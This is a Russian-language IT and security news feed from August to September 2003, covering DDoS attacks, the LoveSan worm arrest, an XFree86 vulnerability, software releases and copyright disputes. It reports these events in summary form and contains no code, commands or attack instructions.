На прошлой неделе сайты Rackspace Managed Hosting и Rackshack, двух крупнейших американских хостинговых компаний, подверглись DDoS-атакам, сообщает сайт Netcraft News. Первая DDoS-атака на сайт Rackspace Managed Hosting состоялась 26 августа, всего через день после того, как руководство компании заявило о своей готовности противостоять действиям подобного рода. 29 числа аналогичному нападению подверглись серверы Rackshack, а 30 августа в результате еще одной DDoS-атаки на 2,5 часа из строя снова вышел сайт Rackspace Managed Hosting. Подвергшиеся кибернападениям компании сумели избежать масштабных сбоев в работе своих клиентов. С учетом того, что услугами Rackspace Managed Hosting и Rackshack пользуются 2,5% общемирового числа веб-сайтов, результаты DDoS-атак могли принести пользователям интернета весьма ощутимый ущерб. Источник - http://www.viruslist.ru
3/09/2003 13:12 Microsoft начала тестирование новой версии Windows Installer.
Компания Microsoft дала старт бета-тестированию пакета Windows Installer 3.0, предназначенного для установки обновлений к программным продуктам компании. Выпуск Installer 3.0 станет важным шагом на избранном Microsoft пути по упрощению установки патчей для своих продуктов. Если сейчас для этой цели используются восемь различных программ, то в будущем их останется только две. В новой версии Windows Installer появятся многочисленные нововведения: возможность удаления любого из обновлений, функция по управлению порядком установки патчей и т.д. Не менее важно и то, что Windows Installer 3.0 будет обратно совместим со второй версией этого же пакета, то есть патчи для Installer 2.0 можно будет устанавливать через третью версию пакета, и наоборот. Правда, в последнем случае не будут поддерживаться новые функции, появившиеся в Windows Installer 3.0. В ближайшее время Windows Installer 3.0 станет доступен подписчикам службы Microsoft Betaplace. Исчтоник - http://www.compulenta.ru
3/09/2003 13:10 Вторая версия почтового клиента The Bat.
Компания Ritlabs выпустила новую версию популярного почтового клиента The Bat! 2.0. Данная версия отличается от предыдущей ветви 1.xx обновленным интерфейсом и новыми возможностями, среди которых, прежде всего, стоит отметить корректную работу с почтовым протоколом IMAP. Новая версия почтового клиента имеет более широкие возможности по работе с IMAP. В предыдущих версиях работа с данным протоколом мало чем отличалась от получения почты по POP3 - сообщения загружались с сервера полностью. Теперь появилась возможность загружать только заголовки сообщений и загружать текст сообщений выборочно, также как в почтовых программах Mozilla Mail и Microsoft Outlook. Кроме того, в The Bat! 2.0 появился планировщик, напоминающий о необходимости ответить на отмеченные заранее письма. В редакторе писем теперь можно писать сообщения в формате HTML, со вставкой картинок. Отображение HTML-писем было также улучшено. Появилась поддержка PGP вплоть до 8 версии, имеется также возможность подключения плагина, определящего принадлежность сообщения к спаму. Программа по-прежнему распространяется согласно правилам sharewarе: пользователь может бесплатно пользоваться The Bat! 2.0 в течение тридцати дней, после чего необходимо купить коммерческую версию. Подробнее - http://www.ritlabs.com/
3/09/2003 13:08 Арестованный автор версии LoveSan: я не тот, кто нужен властям
18-летний американец Джеффри Парсон, задержанный по подозрению в создании модифицированной версии червя LoveSan, считает, что власти США уделяют излишнее внимание его преступлению, а СМИ неверно описали его как компьютерного затворника. "У меня есть хорошие, очень близкие друзья. Я не совершаю необдуманных поступков, не употребляю наркотики и алкоголь, и не курю. Этот случай - мой первый конфликт с законом. Очень неприятно наблюдать за распространением слухов обо мне. Я не комплексую по поводу собственного веса и не считаю себя неудачником", - приводит Associated Press слова Парсона, сказанные им в интервью сайту MSNBC. Подозреваемый в создании версии червя LoveSan выразил беспокойство в связи с тем, что власти намереваются сделать его дело показательным: "Я понимаю, что правительству нужно кого-то арестовать за эти преступления. Я - не тот, кто им нужен". В случае признания Парсона виновным, ему грозит штраф в размере 250 тысяч долларов и лишение свободы сроком до 10 лет. Первое судебное слушание по делу 18-летнего вирусописателя состоится 17 сентября в Сиэтле Источник - http://www.lenta.ru
3/09/2003 13:01 Петербургский хакер набрал по 100 баллов по русскому и математике в тестовой системе Минообразования,
Петербургский хакер, называющий себя Sp0Raw, сумел проникнуть в систему централизованного тестирования Минобразования, сообщает газета "Ведомости". Компьютерное тестирование - одна их двух форм централизованной проверки знаний учащихся. Перед тестом в образовательное учреждение высылается компакт-диск с зашифрованными заданиями и вариантами правильных ответов. Пароль позволяющий расшифровать и запустить программу тестирования сообщается ответственному лицу накануне проведения испытаний. При наличии программы, созданной Sp0Raw, жаждущему быстрых успехов учащемуся достаточно ввести с клавиатуры номер варианта теста, получить список правильных ответов к нему и ввести в их в тестовый компьютер. Для упрощения задачи хакерское приложение позволяет тестируемым создавать отчет по выполнению теста с заданным количеством правильных ответов. В качестве иллюстраций своих достижений Sp0Raw прошел тестирование и набрал по 100 из 100 баллов по русскому языку и математике повышенной сложности. По словам хакера, сотрудники центра тестирования даже не установили факт мошенничества. "Мой интерес был в том, чтобы исследовать систему. Я помню, как смотрел фильмы вроде "Хакеров" и смеялся. Думал: интересно, когда подобное можно будет в России сделать. И вот, похоже, настали времена. А тут еще и электронные паспорта ввести собираются - вообще раздолье", - сообщил "Ведомостям" Sp0Raw. Источник - http://www.vedomosti.ru/
3/09/2003 12:56 SCO оштрафована за клевету
Компания SCO Group оштрафована на 10800 долларов США за нарушение решения немецкого суда. Три месяца назад суд запретил SCO публиковать необоснованные угрозы в адрес пользователей Linux. Источник:http://www.securitylab.ru/?ID=40043
2/09/2003 12:48 Как перейти в Linux на ядро 2.6.
На KernelTrap появилась статья описывающая пошаговый процесс обновления сушествующей инсталяции Linux с ядром 2.4 до последнего тестового ядра 2.6.0-test4. Статья написана Jeremy Andrews из Флориды. Статья - http://kerneltrap.org/node/view/799
2/09/2003 12:30 Юго-восточная Азия готовит ответ Windows.
Представители японского правительства заявили о намерении разработать в стране собственную операционную систему и таким образом избавиться от зависимости от Windows, созданной компанией Microsoft, сообщает агентство UPI. Предложения, касающиеся создания азиатской операционной системы, министр промышленности и торговли Японии Такео Хиранума представит своим китайским и южнокорейским коллегам в среду в Пномпене в рамках встречи членов ассоциации народов юго-восточной азии. В Японии исследования, направленные на создание новой операционной системы, уже начались. Подробнее - http://www.menafn.com/qn_news_story.asp?StoryId=...
1/09/2003 22:20 Выпуск Linux 2.4.22.
Приносим извинения за несколько запоздавшую новость, но "лучше позже, чем никогда". Марсело Тосатти (Marcelo Tosatti) выпустил новое стабильное ядро серии 2.4. Изменений по сравнению с предыдущим 2.4.22-rc4 нет. Changelog - http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.22
1/09/2003 22:13 Планы выхода FreeBSD 4.9.
Как сообщает команда разработчиков FreeBSD, 25 августа ветка RELENG_4 будет заморожена, выйдет 4.9-PRERELEASE. Первый кандидат в релизы появится 12 сентября, второй - 17 сентября. Выход FreeBSD 4.9-RELEASE запланирован на 29 сентября. Источник - http://www.freebsd.org/releases/4.9R/schedule.html
1/09/2003 21:00 Вышел августовский номер журнала "Системный администратор".
На сервере SAMAG.RU объявлено о выходе нового, августовского, номера журнала "Системный администратор". В номере: Восстановление удаленных файлов с CD-R/CD-RW и с очищенных CD-RW; Мониторинг Windows-серверов с помощью Nagios. Часть 2; Установка необходимого количества идентичных Linux на основании заранее определенной конфигурации; NETFILTER. Общие сведения и пример использования; Подробное описание новых средств, появившихся и получивших качественную поддержку в 5 ветке FreeBSD; OpenBSD. Первые шаги. Настройка системы после ее установки; NetBSD: установка и настройка; Эффективная почтовая система на базе Exim; Основные идеи, лежащие в основе построения помехозащитных кодов; Протокол V.90; Регулярные выражения и поиск текста в Perl. Подробнее - http://www.samag.ru/
1/09/2003 20:31 Уязвимость в XFree86.
Некто blexim опубликовал сообщение о существовании множественных уязвимостей в библиотеках работы со шрифтами популярного пакета реализации X Window System в мире открытых систем XFree86. Многие переменные, передающиеся от сервера шрифтов к клиенту некорректно обрабатываются этими библиотеками, что позволяет, при формировании определённых сетевых пакетов вызвать переполнение буфера в куче и стеке. Это, в свою очередь, может позволить выполнить произвольный код в системе. Это может привести к получению прав суперпользователя как удалённо. так и локально. При этом, необходимо признать, использование данной уязвимости довольно ограничено, поскольку предполагает работу клиента с сервером шрифтов, что не является очень распространённой ситуацией. Тем не менее, в репозитарии CVS XFree86 произведено обновление, устранёющее уязвимость, которая обнаружена в текущей версии XFree86 - 4.0.3. Будем ожидать обновления XFree от основных производителей дистрибутивов открытых ОС. Подробности - http://www.securityfocus.com/archive/1/335592/2003-08-28/2003-09-03/0
1/09/2003 19:47 Хакеры атакуют с помощью XML.
Иностранные специалисты по информационной безопасности предупреждают, что в скором времени можно ожидать появления в интернете нового поколения хакерских атак, связанных со взломом веб-услуг, использующих язык XML. О возможной глобальной атаке, которую могут начать хакеры через веб-службы, сохраняющие данные о пользователях и автоматически осуществляющие почтовые рассылки, рассказал Стив Оррин (Steve Orrin), технический директор Sanctum, вендора защитного ПО для веб-приложений. «Суть атаки будет состоять в использовании механизма конверторов XML с целью получения доступа к ресурсам вне текущих документов», — поясняет Оррин. - Таким образом, может быть взломан любой сервер или станут доступными хранящиеся на серверах данные». Это всего один пример из целой серии нарисованных Оррином сценариев XML-атак по мере распространения веб-ориентированных приложений. Среди перечисляемых им уязвимостей фигурируют попытки взлома через SOAP-сообщения приложений SAP BAPI, ложные SQL-команды для Xquery и редирекция XML Schema. Источник - http://www.cnews.ru
1/09/2003 19:26 Sun предлагает награду за тестирование Solaris.
Sun Microsystems предприняла дополнительные шаги по усилению аппаратной поддержки, необходимой для повышения популярности операционной системы Solaris на Intel-компьютерах. Компания начала акцию по привлечению индивидуальных пользователей к тестированию Solaris на оборудовании разных производителей. Кроме того, она заключила соглашения с новыми корпоративными партнерами. Sun подарит запоминающее устройство USB емкостью 64 Мбайт каждому, кто проведет сертификационные испытания и предоставит компании результаты, — об этом сообщила вице-президент по маркетингу программных продуктов Энн Уэттерстен. Испытания проводятся с применением выпущенного компанией в мае бесплатного комплекса ПО, обеспечивающего работу с ОС такой аппаратуры, как дисководы CD-ROM, сетевые платы или вся система. Сейчас для работы с Solaris сертифицировано около ста систем, включая 32 настольных ПК и сервера и 69 лаптопов. Источник - http://news.zdnet.co.uk/software/linuxunix/0,39020390,39116038,00.htm
1/09/2003 19:03 "Хит-парад" вирусов августа от "Лаборатории Касперского".
"Лаборатория Касперского" сегодня опубликовала 20-ку самых распространённых вирусов августа сего года. Следует отметить, что подавляющее большинство обнаруженных вредоносных программ составляют сетевые черви - 90.47%, что говорит о том, что большинство вирусописателей делают упор не только на заражение компьютера жертвы, но и дальнейшее распространение их детища. На первом месте с большим отрывом находится червь Sobig - 61.49% (в значительной мере благодаря появившимся в крайнее время его клонов), на втором - Mimail - 4.06%, на третьем - Tanatos - 3.49%. На четвёртое место стремительно поднялся недавно появившийся опаснейший червь LoveSan, которого судя по всему (в том числе и по беспечности подавляющего числа рядовых пользователей Интернет) ещё ожидает взлят в сентябре. Подробнее - http://www.kaspersky.ru/news.html?id=1326865
1/09/2003 18:51 Австралийский хакер украл премиальных баллов на 230 полётов.
Суд австралийского города Сидней признал виновным в несанкционированном получении и фальсификации информации 31-летнего Ферри Сутана Малина, сообщает diarioTI.com со ссылкой на газету The Sydney Herald. В течение двух лет Малин сумел похитить из базы данных авиакомпании Qantos премиальные баллы почти 11 миллионов ее постоянных клиентов. Прежде чем правоохранительные органы сумели выйти на след хакера, он совершил 230 бесплатных перелетов самолетами Qantos. В ходе следствия выяснилось - прежде чем заняться кражами премиальных баллов, Малин некоторое время проработал непосредственно в пострадавшей от его преступной деятельности компании. Подробности - http://diarioti.com/gate/n.php?id=3993
31/08/2003 18:46 Microsoft защищается при помощи Linux-серверов.
Как сообщает ZDNet, Micrisoft заключила договор с компанией Akamai, Linux-сервера которой обеспечат Web-сервер софтверного гиганта от атак различных червей и вирусов. Как известно, в результате одной из подобных атак Вэб-сервер Microsoft (DoS-атака) благополучно лежал около 2-х дней. Как стало известно компании Netcraft, были изменены данные в базе данных DNS-сервера таким образом, чтобы запрос к www.microsoft.com перенаправлялся на кэширующие сервера Akamai, 15.000 серверов которой под управлением Linux Разбросаны по всему земному шару. Также сообщается о том, что в результате атаки червя Blaster пострадал также сервер обновлений ПО Windows - Windowsupdate.com. Подробности - http://news.zdnet.co.uk/software/linuxunix/0,39020390,39115920,00.htm
31/08/2003 16:39 RIAA раскрывает методы слежки за пользователями интернета.
В прессу просочились некоторые подробности того, как именно Американская ассоциация звукозаписывающих компаний (RIAA) ведет охоту на онлайновых музыкальных пиратов. В последние месяцы индустрия звукозаписи направила провайдерам более 1300 запросов на установление личностей пользователей, активно обменивающихся музыкой через интернет. И хотя провайдеры резко выступают против такой практики, закон на стороне RIAA - ранее суд отклонил иск провайдера Verizon, оспаривающий законность требований на разглашение имен пользователей. Во-первых, производится анализ тегов в MP3-файлах. В ряде случаев в них указывается имя того, кто скопировал музыку на компьютер или же название пиратского сайта, откуда файлы были загружены. Если же в тегах нет ни намека на происхождение файлов, то в дело идет накопленная RIAA база данных по музыкальным файлам. Она содержит их уникальные характеристики или хэши (hash), которые позволяют достоверно судить об идентичности нескольких файлов друг другу. В настоящее время в распоряжении RIAA есть база данных по хэшам музыки, распространявшейся в сети Napster вплоть до мая 2000 года. Об этих методах выявления пиратской музыки RIAA сообщила в документах, направленных в суд по делу одной из обвиняемых в музыкальном пиратстве через интернет. Ответчик и ее адвокат пытались указать на то, что вся найденная на компьютере музыка была скопирована с лицензионных CD, но в RIAA утверждают, что по своим характеристикам многие файлы идентичны файлам, которые в свое время курсировали в Napster, а теперь встречаются в других подобных сетях. Источник - http://www.compulenta.ru
31/08/2003 16:07 Взломщик DVD проиграл суд.
Очередной этап дела о создании и распространении в Сети программы DeCSS завершен. Автор утилиты для просмотра защищенных DVD-фильмов признан виновным. Верховный суд штата Калифорния вынес решение по делу о публикации исходного кода программы DeCSS в Интернете. Напомним, что утилита была написана норвежцем Йоном Йохансеном, который уже получил с подачи СМИ прозвище DVD-Йон. Сам Йон утверждает, что использовал утилиту для просмотра DVD-фильмов на своем компьютере на базе Linux. Вскоре DeCSS появилась в Интернете и начала быстро распространяться, получив статус реального инструмента по взлому защищенных DVD. Естественно, это не прошло мимо взора китов киноиндустрии, обвинивших создателя в пособничестве массовому пиратству. Начиная с 1999 года, суды различных инстанций выносили противоречащие друг другу решения. Аргументом ответчиков является Первая поправка к конституции США, гарантирующая свободу слова (читай - публикацию исходников DeCSS в Сети). Сам Йохансен утверждает, что разработал утилиту не для взлома защиты Content Scrambling System, что отрицают истцы. Источник - http://www.runet.ru
31/08/2003 15:35 Windows уязвима по своей природе.
Эпидемия червя SoBig s который раз подняла вопрос об уязвимости компьютеров, работающих под Windows. В адрес создателей операционки звучит все больше критики. Гневной статьей на тему уязвимости Windows отметилась влиятельная Washington Post. Она опубликовала статью с красноречивым названием "Windows уязвима из-за своей архитектуры". В статье говорится о том, что между появлением червя Win32.Blaster и вируса SoBig прошло две "долгих" недели, особенно напряженных для пользователей Windows. В то же время ни один из владельцев компьютеров с Linux или MacOS не страдал из-за вирусной эпидемии. В частности, речь идет о неуемном стремлении сделать порты машин, использующих Windows, максимально уязвимыми для стороннего проникновения. При этом один из директоров Microsoft - Джеф Джонс - утверждает, что Windows XP максимально отвечает запросам клиентам в плане сетевых подключений. Источник - http://www.washingtonpost.com/
31/08/2003 14:27 Ущерб от действия вирусов в августе превысил $8 млрд.
Август оказался относительно спокойным месяцем с точки зрения обнаружения атак, однако ущерб, наносимый компьютерными вирусами, превысил средние показатели. Главным источником ущерба в этом месяце стали атаки Msblast, начавшиеся с середины августа, а также последовавший следом вирус Sobig, последняя версия которого появилась на прошлой неделе. По данным mi2g, ущерб, причиненный Sobig, оценивается в $5,59 млрд. Таким образом, Sobig стал четвертым самым разрушительным вирусом, после вируса №1 - Klez (мировой ущерб от которого составил $13,92 млрд.), №2 - Love Bug ($8,75 млрд.) и №3 - Yaha ($6,32 млрд.). Вирус Msblast, также известный под другим названием - LoveSan - причинил мировой экономике ущерб на сумму $525 млн., что не позволяет внести этот вредоносный код в десятку наиболее разрушительных вирусов. Всего в августе было зафиксировано 16160 компьютерных атак, в связи с чем месяц занимает 5 место по степени уязвимости с начала 2003 г. Рекордное количество атак было зафиксировано в мае - 25262. Тем не менее, экономический ущерб от зарегистрированных атак в августе является минимальным с начала 2003 г. и составляет всего $803 млн., в то время как в апреле - в связи с войной в Ираке, ущерб составил $2,3 млрд. Всего же ущерб от всех вредоносных программ в августе составил около $5,52 млрд. Общий ущерб от зарегистрированных и незарегистрированных атак во всем мире по итогам августа оценивается примерно в $8,23 млрд. Источник - http://www.mi2g.com/
31/08/2003 14:18 Norton Antivirus защитили от копирования.
Компания Symantec, разработчик антивирусного программного обеспечения Norton Antivirus – одной из самых любимых пиратами программ, намерена внести коррективы в стратегию продаж своих продуктов. Чтобы защитить новую версию антивирусного программного обеспечения Norton Antivirus 2004 от несанкционированного копирования, Symantec вводит процедуру активации купленного ПО. Впрочем, эта инициатива не нова для софтверного рынка и уже довольно давно используется рядом других компаний, так что и пираты, в свою очередь, научились обходить поставленные препоны. По данным Symantec, Norton занимает второе место по популярности у пиратов, делающих копии программного обеспечения, так что необходимость защиты продукта назрела довольно давно. Пользователи, купившие Norton Antivirus 2004 и не прошедшие процедуру активации продукта в течение 15 дней со дня его инсталляции, не смогут воспользоваться этим ПО. Такая практика уже применяется другими софтверными компаниями, и руководство Symantec считает, что новые правила использования этого популярного антивирусного продукта никак не отразятся на его продажах. Об этом свидетельствуют данные, полученные на рынках Японии, Великобритании, США, Германии и Австралии, где в рамках тестовой программы было продано 250 тыс. копий антивируса. Руководство компании утверждает, что количество звонков в службу технической поддержки от пользователей, купивших Norton Antivirus в этих странах, не только не возросло, как этого можно было бы ожидать, но даже сократилось. После первой активации Norton Antivirus, конфигурацию компьютера можно без проблем менять пять раз. В дальнейшем, чтобы антивирус работал, потребуется позвонить в службу технической поддержки Symantec. Фактически это позволяет ставить одну копию Norton Antivirus на пять компьютеров. «Мы боремся с массовым пиратством, а не с домашними пользователями», - заявил региональный менеджер по продуктам Symantec Норман Колбергер (Norman Kohlberger). Таким образом, Symantec поступает куда мягче, чем ряд других компаний, позволяющих устанавливать свое ПО лишь на одну машину. Источник - http://www.cnews.ru
31/08/2003 13:12 Вышли новые версии Opera и Mozilla.
Два оставшихся серьезных конкурента веб-браузера Microsoft Internet Explorer вышли в новых версиях, обещающих повышенное быстродействие и более стабильный серфинг. В среду проект Mozilla, нацеленный на создание версии open-source браузера Netscape, выпустил бета-версию 1.5. А в четверг норвежская компания Opera Software предложила отредактированную версию своего браузера. Много лет оба браузера пользовались уважением за поддержку тех веб-серферов, которые не желают работать с Microsoft Internet Explorer. Но эта группа остается малочисленной. По данным OneStat.com, свыше 95% веб-серферов пользуется браузером Microsoft. Между тем на долю Mozilla приходится всего около 1,6% пользователей, а на долю Opera — 0,6%. Новые версии обоих браузеров являются промежуточными и не несут в себе серьезных усовершенствований. Согласно сопроводительной записке, новая бета-версия Mozilla лучше поддерживает Internet Relay Chat (IRC), XML и стандарты, проверяет орфографию в сообщениях e-mail и быстрее загружает файлы. Бета-версия Opera отличается ускоренной загрузкой, содержит усовершенствования в редакции для карманных компьютеров, поддерживает иврит и арабские языки и имеет другие мелкие новшества. О Mozilla - http://www.mozilla.org/releases/mozilla1.5b/README.html Oб Opera - http://www.opera.com/windows/changelogs/720b/
30/08/2003 17:27 В США арестован создатель червя LoveSan.
Сотрудники американских правоохранительных органов, занимающиеся преступлениями в сфере информационной безопасности, арестовали в пятницу 18-летнего жителя Миннесоты Джеффри Ли Парсона, сообщает Associated Press. Задержанному инкриминируют создание b-версии сетевого червя LoveSan (Blaster). В ходе обыска, проведенного сотрудниками ФБР совместно с секретной службой министерства финансов во вторник, из дома Парсона было изъято 7 компьютеров. 18-летний житель Миннесоты создал версию червя, которая начала активно распространяться 13 августа. По словам специалистов в области антивирусной защиты, b-версия почти ничем не отличалась от оригинальной. В числе прочего Парсон изменил имя исполняемого файла msblast.exe. Подробнее - http://story.news.yahoo.com/news?tmpl=story...
30/08/2003 17:09 Выход Mandrake Linux 9.2 RC1.
28 августа вышел Mandrake Linux 9.2 Release Candidate 1, скорее всего последний перед выходом основного релиза. MandrakeSoft сообщает о доступности для скачивания и тестирования новой версии. Тестируйте по возможности побыстрее, так как это скорее одна из последних версий перед выходом основного дистрибутива Mandrake 9.2. Желающие скачать и протестировать могут это сделать, обратившись по ссылке, приведённой ниже на список серверов и зеркал. Список зеркал - http://www.mandrakelinux.com/ru/92beta.php3
30/08/2003 16:56 Symantec обновит Norton Antivirus.
Symantec анонсировала антивирусный пакет Norton Antivirus 2004, рекламируемый как противоядие от сложных вирусов типа червя MSBlast. Новая версия флагманского антивирусного продукта компании, выпуск которого ожидается в сентябре, содержит более мощные инструменты сканирования, предназначенные для борьбы с невирусными формами компьютерных напастей, такими как программы подглядывания, а также с поколением вирусов, использующих несколько точек входа в ПК жертвы и несущих несколько «зарядов». По словам представителей Symantec, пакет Norton AntiVirus 2004 будет распознавать злоумышленное ПО в точке входа в систему, прочесывая программы e-mail и instant messaging (IM). Компания отмечает, что последние вирусы использовали сразу несколько точек входа в ПК жертвы, в том числе веб-сайты. Кроме того, пакет обеспечит дополнительную защиту пользователям операционной системы Microsoft Windows 2000/XP. Он будет разыскивать вирусы, спрятанные в компрессированных файлах, которые часто пересылаются по сетям peer-to-peer или через IM-инструменты. В новую версию включены также инструменты обнаружения шпионского ПО — скрытых приложений, применяемых для выведывания частной информации пользователя или наблюдения за его действиями. Подробнее - http://zdnet.com.com/2100-1104_2-5067625.html
30/08/2003 16:42 Устройства на базе флэш-памяти создают угрозу для безопасности.
Флэш-память и медиакарты представляют серьезный риск для безопасности компаний, утверждают эксперты. Администраторы не в состоянии контролировать информацию, переносимую между подобными устройствами высокой емкости и корпоративными сетями, в отличие от e-mail и другого сетевого трафика. Это создает серьезную угрозу, так как эти устройства могут применяться для копирования конфиденциальных данных из интрасети или для заброски за брандмауэр компании опасных или вредоносных файлов. Луис Оули, управляющий директор компании SecureWave, специализирующейся на выпуске ПО для предотвращения проникновений, осудил Microsoft за отказ включить в Windows 2000 и XP инструменты, позволяющие эффективно контролировать продукты данного типа. Он привел в пример случай с агентом по торговле недвижимостью из Англии, который купил, как он думал, новую флэш-карту Sony Memory Stick, но, вставив ее в свой ПК, обнаружил, что в устройстве содержатся конфиденциальные истории болезни раковых пациентов местной больницы. В последние годы популярность устройств на базе флэш-памяти растет. Они способны хранить большие объемы данных и могут использоваться в качестве сменных носителей для ПК, которые часто просто вставляются в порт USB. Источник -
30/08/2003 15:38 Антиспамерский «черный список» закрылся из-за шквала атак DDoS.
Серверы Osirusoft, одного из крупнейших «черных списков» антиспама, были отключены оператором после шквала распределенных атак на отказ обслуживания (DDoS), который обрушился на эту службу. В последнее время службы, подобные relays.osirusoft.com, критикуют за то, что наряду со спамом они блокируют и легитимные электронные письма. Osirusoft использует несколько методов ведения динамического списка IP-адресов, замеченных в распространении спама. Применяя такой список в реальном времени, почтовый сервер может определить, принять и обработать сообщение или отбросить его как спам. Директор австралийского провайдера широкополосного доступа Ideal Internet Services Даррен Уорли придерживается правила не пользоваться черными списками. «Мы не применяем их по нескольким причинам... связанным с контролируемостью. Вы передаете контроль какой-то другой организации, а потеря организацией управления над собственными серверами e-mail опасна для бизнеса». Подробности - http://www.zdnet.com.au/newstech/...
29/08/2003 20:11 Маршрутизаторы Netgear атакуют ни в чем не повинные сервера.
Компания Netgear с прискорбием сообщила, что некоторые образцы ее оборудования могут самопроизвольно инициировать DoS-атаки. Проблема, как сообщает newwws.ru со ссылкой на ZDNet, возникла вследствие некорректной реализации Network Time Protocol протокола, используемого сетевыми устройствами для связи с серверами точного времени, необходимого для синхронизации их встроенных часов. Ошибка заключается в том, что если time-сервер по какой-либо причине не в состоянии вовремя ответить на поданный запрос, роутер продолжает яростно бомбардировать его вопросами «который час?» и «как пройти в библиотеку?» до тех пор, пока time-сервер не умрет окончательно, согнувшись под бременем непосильной нагрузки. Не так давно, NTP-сервер Висконсинского университета уже стал жертвой такой непреднамеренной атаки: задумавшись на несколько секунд, он мгновенно получил шквал аплодисментов от бюджетных роутеров Netgear с частотой до 250 тысяч запросов в секунду или же – на несколько сот мегабит в эквиваленте за тот же период времени. Судя по имеющимся данным, полученным в ходе совместного расследования, ошибке подвержены только роутеры моделей RP614, RP614v2, DG814, MR814 и HR314. Над устранением проблемы ведется активная работа, однако специалисты полагают, что ошибка настолько фундаментальна, что на ее устранение уйдут еще многие годы. Источник - http://www.securitylab.ru
29/08/2003 19:08 Компьютерный вирус снял с бухгалтера обвинения в уклонении от уплаты налогов.
Атака неизвестного компьютерного вируса стала поводом для оправдания американского бухгалтера, которому было предъявлено обвинение в уклонении от уплаты налогов, сообщает сайт газеты The Sydney Morning Herald. Власти штата Алабама обвинили 44-летнего руководителя бухгалтерской фирмы Pitts, Daniels & Co в уклонении от уплаты налогов по итогам 1997, 1998 и 1999 годов. Обвиняемый Юджин Питтс признал, что предоставленные им отчеты действительно содержали неверные цифры. Однако причиной этого Питтс назвал не собственный злой умысел, а атаку неизвестного вируса. Питтс утверждает, что не подозревал о проникновении вируса в свой компьютер до тех пор, пока в 2000 году его не обвинили в искажении данных о личных и корпоративных доходах. Представители обвинения отметили, что неизвестный вирус почему-то не исказил сведений ряда клиентов Питтса, данные которых хранились в том же компьютере. Этот аргумент решающего влияния на суд не оказал, и после трехчасовых дебатов бухгалтер был признан невиновным. В случае признания его вины, Питтсу грозило лишение свободы на срок до 33 лет, штраф на сумму до 900 тысяч долларов и лишение бухгалтерской лицензии. Источник - http://www.al.com/birmingham/
29/08/2003 17:42 ФБР обнаружило автора Blaster'а
ФБР объявило о том, что его агентам удалось вычислить автора одного из самых нашумевших вирусов этого года - червя LovSan, также известного под кодовыми названиями Blaster и MSBLAST. Этот вирус доставил серьезные неудобства пользователям интернета и стал причиной замедления трафика в последние недели. Подозреваемый - 18-летний житель США, имя которого не разглашается в интересах следствия. Подросток пока не задержан, ФБР планирует арестовать его сегодня. Источник: http://www.cnews.ru/newtop/index.shtml?2003/08/29/147995
29/08/2003 17:32 Динамическое изменение кода MSIL с использованием .NET Framework Profiling API
В сентябре MSDN Magazine в очередной раз порадует кодокопателей. В статье о динамической модификации кода автор (судя по имени\фамилии - наш соотечественник) демонстрирует способ динамической перезаписи MSIL (Microsoft Intermediate Language) с использованием Profiling API из Common Language Runtime. В отличии от подхода, основанного на Reflection.Emit, эта схема работает с уже существующими сборками и не требует создания proxy или динамических сборок. Необходимость подобного редактирования промежуточного кода может возникнуть в случае, когда у вас есть желание сделать изменение программы прозрачным для клиента. http://msdn.microsoft.com/msdnmag/issues/03/09/NETProfilingAPI/default.aspx
28/08/2003 03:44 ЖК книги становятся реальностью.
Корпорация Hewlett Packard создала прототип устройства, которое может в корне изменить человеческое представление о книге и заменить целую библиотеку. Устройство размером не больше стандартной книги и толщиной не более одного сантиметра, представляет собой жидкокристаллический экран, по периметру которого располагаются сенсорные панели. Процесс перелистывания страниц максимально приближен к оригинальному: читатель проводит пальцем по одной из сенсорных панелей, и страница визуально "переворачивается". По желанию, можно выделять фрагменты текста и увеличивать его. Аналогичным образом осуществляется и чтение газет. Источник - http://www.lenta.ru/internet/2003/08/25/book/
28/08/2003 03:09 Компания Osirusoft прекратила работу своей системы DNSBL.
После недавно проведенной DDoS атаки против системы DNSBL, которая содержит черный список спамеров - relays.osirusoft.com, руководство компании Osirusoft приняло решение прекратить работу DNSBL системы. Теперь на все запросы к спискам osirusoft.com возвращается факт блокировки, что привело к неработоспособности всех систем, которые использовали в качестве списков спамеров списки osirusoft.com. Источник - ZDNet Australia
28/08/2003 02:54 Сервис-пак для Windows XP не выйдет в этом году.
На своем официальном сайте компания Microsoft обновила предположительный график выхода обновлений для своих ОС. Согласно этому графику выход сервис-пака для ОС MS Windows XP Home/Professional Edition следует ожидать в третьем квартале 2004 года. Причины столь долгой задержки не разглашаются, но несмотря на это сервис-пак для MS Windows Server 2003, как и планировалось, выйдет в начале 2004 года. Подробнее - http://www.microsoft.com
28/08/2003 02:27 Новая статья: Об упаковщиках в последний раз: Часть первая - теоретическая.
Статья дает абсолютно необходимый минимум теории, который позволит успешно распаковывать файлы. В статье также описывается формат XML, который затем переводится в CSS-HTML при помощи XSLT-процессора. Ознакомиться: http://www.uinc.ru/articles/41/index.shtml
28/08/2003 02:09 Демонстрация протеста против принятия Европейским Парламентом закона о софтверных патентах.
Software patent предполагает возможность получения автором компьютерного алгоритма, либо делового метода, исключительного права на его коммерческую эксплуатацию. Именно против принятия закона, дающего такую возможность, и собрались протестовать сотни участников живой акции перед зданием Европарламента в Брюсселе и более шести сотен владельцев веб-сайтов в Сети. http://computerra.ru/focus/coment/28664/ Как заметил один из посетителей нашего сайта, сайт разработчиков MRTG (http://people.ee.ethz.ch/~oetiker/webtools/mrtg/) тоже участвует в этой акции.
28/08/2003 00:59 Новая версия PE Tools v1.5.320.2003
Что нового в этой версии: + Добавлены новые сигнатуры (Tnx: .Cryorb/BiDark/dyn!o/Mike/DeMoNiX/Volodya) + Оптимизированн код PE Sniffer-a + В PE Sniffer добавлены новые методы сканирования: стандартный и эвристический + Исправлено несколько мелкий багов + Переработан алгоритм обработки секций (Tnx: Volodya, SEH) + Исправлены крупные баги в (Tnx: cyberbob): - Full Dump: force RAW mode - Full Dump: rebuild image - Full Dump: paste header from disk Скачать последнюю версию: http://www.uinc.ru/scripts/load.cgi?files/neox/PE_Tools.zip
27/08/2003 02:52 RIAA запугала американцев.
Согласно исследованию, проведенному компанией NPD Group, количество домашних пользователей P2P в Америке резко сократилось. Так, если в апреле этого года музыку по сети скачивали 14,5 млн. пользователей, то в мае - уже 12,7 млн. В июне, по данным NPD Group, только 10,4 млн. американцев пользовались файлообменными сетями. Источник: http://www.compulenta.ru/2003/8/26/41573/ Между тем, хитроумные китайцы наловчились обмениваться файлами с помощью BitTorrent http://bitconjurer.org/BitTorrent/index.html Что ж, прийдется и нам учиться:). Рекомендую присмотреться к данному опенсорсному продукту.
